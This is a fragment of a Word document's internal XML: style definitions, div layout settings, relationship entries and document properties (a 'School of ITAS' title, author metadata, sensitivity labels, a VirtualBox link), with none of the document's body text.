      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4-Accent5">
    <w:name w:val="List Table 4 Accent 5"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="000C7B7E"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:end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start w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
          <w:end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7"/>
    <w:rsid w:val="003859F4"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
        <w:end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start w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
          <w:end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pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007D4B1A"/>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9064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059212257">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="38961514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58106552">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="799498250">
              <w:marLeft w:val="0pt"/>
              <w:marRight w:val="0pt"/>
              <w:marTop w:val="0pt"/>
              <w:marBottom w:val="0pt"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="765998148">
                  <w:marLeft w:val="146.40pt"/>
                  <w:marRight w:val="0pt"/>
                  <w:marTop w:val="36pt"/>
                  <w:marBottom w:val="0pt"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="80303928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515577848">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="57200490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83389269">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="688606004">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1320112598">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="990256164">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="102729310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82547849">
          <w:marLeft w:val="40.30pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="6.25pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1100881637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="14.20pt"/>
      <w:marRight w:val="14.20pt"/>
      <w:marTop w:val="2.85pt"/>
      <w:marBottom w:val="2.85pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1123156540">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1192649720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1247887193">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1395931914">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1473866855">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="169365062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036469032">
          <w:marLeft w:val="40.30pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="7.20pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="170636413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61264356">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="464658461">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="686760573">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="729770273">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="749038142">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1471704851">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1721200082">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1922371577">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1946764695">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1966278857">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0pt"/>
      <w:marRight w:val="0pt"/>
      <w:marTop w:val="0pt"/>
      <w:marBottom w:val="0pt"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="198969961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045524055">
          <w:marLeft w:val="0pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="219093777">
              <w:marLeft w:val="0pt"/>
              <w:marRight w:val="0pt"/>
              <w:marTop w:val="0pt"/>
              <w:marBottom w:val="0pt"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="217012517">
                  <w:marLeft w:val="146.40pt"/>
                  <w:marRight w:val="0pt"/>
                  <w:marTop w:val="36pt"/>
                  <w:marBottom w:val="0pt"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1601178401">
                      <w:marLeft w:val="0pt"/>
                      <w:marRight w:val="0pt"/>
                      <w:marTop w:val="0pt"/>
                      <w:marBottom w:val="0pt"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="79856989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208714916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82089839">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1997606017">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="483788283">
          <w:marLeft w:val="27.35pt"/>
          <w:marRight w:val="0pt"/>
          <w:marTop w:val="0pt"/>
          <w:marBottom w:val="0pt"/>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5.png"/><Relationship Id="rId18" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image10.png"/><Relationship Id="rId26" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/fontTable" Target="fontTable.xml"/><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5" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/footer" Target="footer1.xml"/><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header" Target="header1.xml"/><Relationship Id="rId5" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image7.png"/><Relationship Id="rId23" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image15.png"/><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hyperlink" Target="http://localhost:8888" TargetMode="External"/><Relationship Id="rId14" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image6.png"/><Relationship Id="rId22" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image14.png"/><Relationship Id="rId27" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/theme" Target="theme/theme1.xml"/></Relationships>
</file>

<file path=word/_rels/header1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://purl.oclc.org/ooxml/officeDocument/relationships/image" Target="media/image1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A348236C-DA18-4948-9E72-924D32B77CB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14</TotalTime>
  <Pages>10</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chool of ITAS</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7529</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:i4>2031711</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.virtualbox.org/wiki/Downloa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ITAS</dc:title>
  <dc:subject/>
  <dc:creator>Cheng Huey Chen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>aden tan</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2008-04-23T01:34:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-02T12:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-05T10:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://purl.oclc.org/ooxml/officeDocument/customProperties" xmlns:vt="http://purl.oclc.org/ooxml/officeDocument/docPropsVTypes">
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="2" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_SiteId">
    <vt:lpwstr>25a99bf0-8e72-472a-ae50-adfbdf0df6f1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Owner">
    <vt:lpwstr>shamzah@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_SetDate">
    <vt:lpwstr>2019-12-16T16:01:18.8529743Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Name">
    <vt:lpwstr>Official (Closed)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_ActionId">
    <vt:lpwstr>b115370d-a465-4d59-aaef-5c948a8e20ec</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_SiteId">
    <vt:lpwstr>25a99bf0-8e72-472a-ae50-adfbdf0df6f1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Owner">
    <vt:lpwstr>shamzah@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_SetDate">
    <vt:lpwstr>2019-12-16T16:01:18.8529743Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Name">
    <vt:lpwstr>Non-Sensitive</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_ActionId">
    <vt:lpwstr>b115370d-a465-4d59-aaef-5c948a8e20ec</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Parent">
    <vt:lpwstr>4bcb20ed-001a-45f4-b2e7-234c5fc91178</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="Sensitivity">
    <vt:lpwstr>Official (Closed) Non-Sensitive</vt:lpwstr>
  </property>
</Properties>
</file>